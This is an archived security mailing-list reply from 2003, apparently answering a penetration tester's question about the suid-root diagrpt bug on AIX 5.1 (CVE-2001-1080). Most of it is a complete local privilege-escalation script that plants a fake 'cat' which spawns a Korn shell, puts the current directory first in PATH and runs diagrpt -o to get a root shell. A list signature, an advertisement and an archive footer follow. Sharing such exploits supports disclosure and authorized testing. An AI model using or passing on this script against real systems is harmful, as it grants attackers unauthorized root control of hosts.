At 02:23 3/9/2003, you wrote: I'm testing an AIX 5.1 system which has the suid root file /usr/lpp/diagnostics/bin/diagrpt bug, see Bugtraq-ID 2916 or CVE-2001-1080. I cannot find info (I have googled) on what to call the executable I place in the $DIAGDATADIR directory. Searching for 'diagrpt' on Groups@Google reveals the following: #!/bin/sh # Create a script which will spawn a korn shell. echo '#!/bin/sh' >cat echo 'echo "** r00t **"' >>cat echo '/usr/bin/ksh' >>cat # Make it executable. chmod +x cat # Make sure the current directory comes first in # your $PATH. oldPath=$PATH export PATH="`pwd`:$oldPath" # run diagrpt with the -o option so it will try # to cat some diagnostics reports for us... /usr/lpp/diagnostics/bin/diagrpt -o Jason Fortezzo fortezzoat_private --- If you have any trouble sounding condescending, find a Unix user to show you how it's done. --Scott Adams ---------------------------------------------------------------------------- Are your vulnerability scans producing just another report? Manage the entire remediation process with StillSecure VAM's Vulnerability Repair Workflow. Download a free 15-day trial: http://www2.stillsecure.com/download/sf_vuln_list.html
This archive was generated by hypermail 2b30 : Tue Mar 11 2003 - 08:50:53 PST